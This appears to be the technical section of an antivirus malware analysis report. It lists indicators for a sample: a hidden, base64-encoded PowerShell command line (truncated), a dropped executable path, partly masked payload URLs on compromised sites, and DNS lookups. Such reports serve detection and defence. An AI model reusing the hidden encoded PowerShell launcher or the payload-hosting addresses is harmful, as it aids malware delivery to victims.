Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -windowstyle hidden -ENCOD IAAgAFMARQB0AC0AaQBUAEUATQAgAHYAQQBSAEkAQQBiAEwAZQA6ADIAUgBGACAAKABbAHQAWQBwAEUAXQAoACIAewA0AH0AewA1AH0AewAyAH0AewAwAH0AewAxAH0AewAzAH0AIgAtAGYAJwAuAG...
- %HOMEPATH%\ho81uzi\fmthkts\fertmt9.exe
- %HOMEPATH%\ho81uzi\fmthkts\fertmt9.exe
- %HOMEPATH%\ho81uzi\fmthkts\fertmt9.exe
- http://fo####llstep.com/cgi-bin/A/
- http://fo####llstep.com/cgi-sys/suspendedpage.cgi
- http://do###arim.com/wp-admin/AYO/
- http://se####ekifix.com/wp-admin/nBJ/
- http://di######ienne-tiffany.com/wp-includes/p/
- DNS ASK fo####llstep.com
- DNS ASK na######aterresources.com
- DNS ASK do###arim.com
- DNS ASK se####ekifix.com
- DNS ASK di######ienne-tiffany.com
- DNS ASK mo###aree.com
- DNS ASK mo####autoloan.com